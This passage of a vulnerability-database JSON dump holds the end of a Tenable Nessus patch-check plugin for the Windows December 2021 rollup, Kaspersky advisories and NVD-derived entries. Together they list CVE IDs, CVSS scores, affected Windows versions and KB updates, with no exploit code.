CVE-2021-43247,\n CVE-2021-43248, CVE-2021-43880, CVE-2021-43883,\n CVE-2021-43893)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-43216, CVE-2021-43222,\n CVE-2021-43224, CVE-2021-43227, CVE-2021-43235,\n CVE-2021-43236)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-43219,\n CVE-2021-43228)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-43217,\n CVE-2021-43232, CVE-2021-43233, CVE-2021-43234)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5008223\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5008223 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43217\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-12\";\nkbs = make_list('5008223');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:20348,\n rollup_date:'12_2021',\n bulletin:bulletin,\n rollup_kb_list:[5008223])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-23T16:29:06", "description": "### *Detect date*:\n12/14/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows 8.1 for x64-based systems \nWindows Server 2022 \nWindows Server, version 2004 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 for 32-bit Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2022 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 8.1 for 32-bit systems \nWindows RT 8.1 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1809 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-43224](<https://nvd.nist.gov/vuln/detail/CVE-2021-43224>) \n[CVE-2021-43230](<https://nvd.nist.gov/vuln/detail/CVE-2021-43230>) \n[CVE-2021-43217](<https://nvd.nist.gov/vuln/detail/CVE-2021-43217>) \n[CVE-2021-43222](<https://nvd.nist.gov/vuln/detail/CVE-2021-43222>) \n[CVE-2021-43216](<https://nvd.nist.gov/vuln/detail/CVE-2021-43216>) \n[CVE-2021-43223](<https://nvd.nist.gov/vuln/detail/CVE-2021-43223>) \n[CVE-2021-43233](<https://nvd.nist.gov/vuln/detail/CVE-2021-43233>) \n[CVE-2021-43238](<https://nvd.nist.gov/vuln/detail/CVE-2021-43238>) \n[CVE-2021-43883](<https://nvd.nist.gov/vuln/detail/CVE-2021-43883>) \n[CVE-2021-43229](<https://nvd.nist.gov/vuln/detail/CVE-2021-43229>) \n[CVE-2021-43245](<https://nvd.nist.gov/vuln/detail/CVE-2021-43245>) \n[CVE-2021-40441](<https://nvd.nist.gov/vuln/detail/CVE-2021-40441>) \n[CVE-2021-43226](<https://nvd.nist.gov/vuln/detail/CVE-2021-43226>) \n[CVE-2021-43234](<https://nvd.nist.gov/vuln/detail/CVE-2021-43234>) \n[CVE-2021-43215](<https://nvd.nist.gov/vuln/detail/CVE-2021-43215>) \n[CVE-2021-41333](<https://nvd.nist.gov/vuln/detail/CVE-2021-41333>) \n[CVE-2021-43236](<https://nvd.nist.gov/vuln/detail/CVE-2021-43236>) \n[CVE-2021-43207](<https://nvd.nist.gov/vuln/detail/CVE-2021-43207>) \n[CVE-2021-43893](<https://nvd.nist.gov/vuln/detail/CVE-2021-43893>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-43217](<https://vulners.com/cve/CVE-2021-43217>)7.5Critical \n[CVE-2021-43216](<https://vulners.com/cve/CVE-2021-43216>)6.8High \n[CVE-2021-43223](<https://vulners.com/cve/CVE-2021-43223>)4.6Warning \n[CVE-2021-43238](<https://vulners.com/cve/CVE-2021-43238>)4.6Warning \n[CVE-2021-43883](<https://vulners.com/cve/CVE-2021-43883>)4.6Warning \n[CVE-2021-43229](<https://vulners.com/cve/CVE-2021-43229>)4.6Warning \n[CVE-2021-43226](<https://vulners.com/cve/CVE-2021-43226>)4.6Warning \n[CVE-2021-43234](<https://vulners.com/cve/CVE-2021-43234>)6.8High \n[CVE-2021-43215](<https://vulners.com/cve/CVE-2021-43215>)6.8High \n[CVE-2021-43893](<https://vulners.com/cve/CVE-2021-43893>)6.0High \n[CVE-2021-43230](<https://vulners.com/cve/CVE-2021-43230>)4.6Warning \n[CVE-2021-43224](<https://vulners.com/cve/CVE-2021-43224>)2.1Warning \n[CVE-2021-43222](<https://vulners.com/cve/CVE-2021-43222>)5.0Critical \n[CVE-2021-43233](<https://vulners.com/cve/CVE-2021-43233>)5.1High \n[CVE-2021-43245](<https://vulners.com/cve/CVE-2021-43245>)4.6Warning \n[CVE-2021-40441](<https://vulners.com/cve/CVE-2021-40441>)4.6Warning \n[CVE-2021-41333](<https://vulners.com/cve/CVE-2021-41333>)4.6Warning \n[CVE-2021-43236](<https://vulners.com/cve/CVE-2021-43236>)5.0Critical \n[CVE-2021-43207](<https://vulners.com/cve/CVE-2021-43207>)4.6Warning\n\n### *KB list*:\n[5008274](<http://support.microsoft.com/kb/5008274>) \n[5008244](<http://support.microsoft.com/kb/5008244>) \n[5008282](<http://support.microsoft.com/kb/5008282>) \n[5008271](<http://support.microsoft.com/kb/5008271>) \n[5015862](<http://support.microsoft.com/kb/5015862>) \n[5015861](<http://support.microsoft.com/kb/5015861>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "kaspersky", "title": "KLA12388 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-41333", "CVE-2021-43207", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43236", "CVE-2021-43238", "CVE-2021-43245", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-07-15T00:00:00", "id": "KLA12388", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12388/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:29:09", "description": "### *Detect date*:\n12/14/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 11 for x64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2022 \nWindows 8.1 for x64-based systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2022 (Server Core installation) \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 8.1 for 32-bit systems \nWindows RT 8.1 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2012 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 10 Version 1809 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-43217](<https://nvd.nist.gov/vuln/detail/CVE-2021-43217>) \n[CVE-2021-43246](<https://nvd.nist.gov/vuln/detail/CVE-2021-43246>) \n[CVE-2021-43231](<https://nvd.nist.gov/vuln/detail/CVE-2021-43231>) \n[CVE-2021-43227](<https://nvd.nist.gov/vuln/detail/CVE-2021-43227>) \n[CVE-2021-40452](<https://nvd.nist.gov/vuln/detail/CVE-2021-40452>) \n[CVE-2021-43216](<https://nvd.nist.gov/vuln/detail/CVE-2021-43216>) \n[CVE-2021-43219](<https://nvd.nist.gov/vuln/detail/CVE-2021-43219>) \n[CVE-2021-43235](<https://nvd.nist.gov/vuln/detail/CVE-2021-43235>) \n[CVE-2021-43223](<https://nvd.nist.gov/vuln/detail/CVE-2021-43223>) \n[CVE-2021-43238](<https://nvd.nist.gov/vuln/detail/CVE-2021-43238>) \n[CVE-2021-43883](<https://nvd.nist.gov/vuln/detail/CVE-2021-43883>) \n[CVE-2021-43229](<https://nvd.nist.gov/vuln/detail/CVE-2021-43229>) \n[CVE-2021-43239](<https://nvd.nist.gov/vuln/detail/CVE-2021-43239>) \n[CVE-2021-43226](<https://nvd.nist.gov/vuln/detail/CVE-2021-43226>) \n[CVE-2021-43232](<https://nvd.nist.gov/vuln/detail/CVE-2021-43232>) \n[CVE-2021-43234](<https://nvd.nist.gov/vuln/detail/CVE-2021-43234>) \n[CVE-2021-40453](<https://nvd.nist.gov/vuln/detail/CVE-2021-40453>) \n[CVE-2021-43215](<https://nvd.nist.gov/vuln/detail/CVE-2021-43215>) \n[CVE-2021-43880](<https://nvd.nist.gov/vuln/detail/CVE-2021-43880>) \n[CVE-2021-43237](<https://nvd.nist.gov/vuln/detail/CVE-2021-43237>) \n[CVE-2021-43893](<https://nvd.nist.gov/vuln/detail/CVE-2021-43893>) \n[CVE-2021-43230](<https://nvd.nist.gov/vuln/detail/CVE-2021-43230>) \n[CVE-2021-43224](<https://nvd.nist.gov/vuln/detail/CVE-2021-43224>) \n[CVE-2021-43247](<https://nvd.nist.gov/vuln/detail/CVE-2021-43247>) \n[CVE-2021-43222](<https://nvd.nist.gov/vuln/detail/CVE-2021-43222>) \n[CVE-2021-41360](<https://nvd.nist.gov/vuln/detail/CVE-2021-41360>) \n[CVE-2021-43244](<https://nvd.nist.gov/vuln/detail/CVE-2021-43244>) \n[CVE-2021-43233](<https://nvd.nist.gov/vuln/detail/CVE-2021-43233>) \n[CVE-2021-43243](<https://nvd.nist.gov/vuln/detail/CVE-2021-43243>) \n[CVE-2021-43228](<https://nvd.nist.gov/vuln/detail/CVE-2021-43228>) \n[CVE-2021-43245](<https://nvd.nist.gov/vuln/detail/CVE-2021-43245>) \n[CVE-2021-43214](<https://nvd.nist.gov/vuln/detail/CVE-2021-43214>) \n[CVE-2021-40441](<https://nvd.nist.gov/vuln/detail/CVE-2021-40441>) \n[CVE-2021-43248](<https://nvd.nist.gov/vuln/detail/CVE-2021-43248>) \n[CVE-2021-41333](<https://nvd.nist.gov/vuln/detail/CVE-2021-41333>) \n[CVE-2021-43236](<https://nvd.nist.gov/vuln/detail/CVE-2021-43236>) \n[CVE-2021-43207](<https://nvd.nist.gov/vuln/detail/CVE-2021-43207>) \n[CVE-2021-43240](<https://nvd.nist.gov/vuln/detail/CVE-2021-43240>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5008223](<http://support.microsoft.com/kb/5008223>) \n[5008215](<http://support.microsoft.com/kb/5008215>) \n[5008218](<http://support.microsoft.com/kb/5008218>) \n[5008206](<http://support.microsoft.com/kb/5008206>) \n[5008212](<http://support.microsoft.com/kb/5008212>) \n[5008263](<http://support.microsoft.com/kb/5008263>) \n[5008277](<http://support.microsoft.com/kb/5008277>) \n[5008230](<http://support.microsoft.com/kb/5008230>) \n[5008207](<http://support.microsoft.com/kb/5008207>) \n[5008285](<http://support.microsoft.com/kb/5008285>) \n[5008255](<http://support.microsoft.com/kb/5008255>) \n[5015875](<http://support.microsoft.com/kb/5015875>) \n[5015863](<http://support.microsoft.com/kb/5015863>) \n[5015877](<http://support.microsoft.com/kb/5015877>) \n[5015874](<http://support.microsoft.com/kb/5015874>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-14T00:00:00", "type": "kaspersky", "title": "KLA12387 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-40452", "CVE-2021-40453", "CVE-2021-41333", "CVE-2021-41360", "CVE-2021-43207", "CVE-2021-43214", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43243", "CVE-2021-43244", "CVE-2021-43245", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43880", "CVE-2021-43883", "CVE-2021-43893"], "modified": "2022-10-18T00:00:00", "id": "KLA12387", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12387/", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "prion": [{"lastseen": "2023-08-16T07:49:43", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43207.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43226", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43226", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43226", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:26", "description": "Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43226.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43207", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43207", "CVE-2021-43226"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43207", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43207", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:56", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43222.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43236", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2022-05-23T17:42:00", "id": "PRION:CVE-2021-43236", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43236", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T07:49:41", "description": "Microsoft Message Queuing Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-43236.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43222", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43222", "CVE-2021-43236"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2021-43222", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43222", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-16T07:49:49", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43231.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43230", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-43230", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-43230", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:49:51", "description": "Windows NTFS Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-43229, CVE-2021-43230.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-15T15:15:00", "type": "prion", "title": "CVE-2021-43231", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 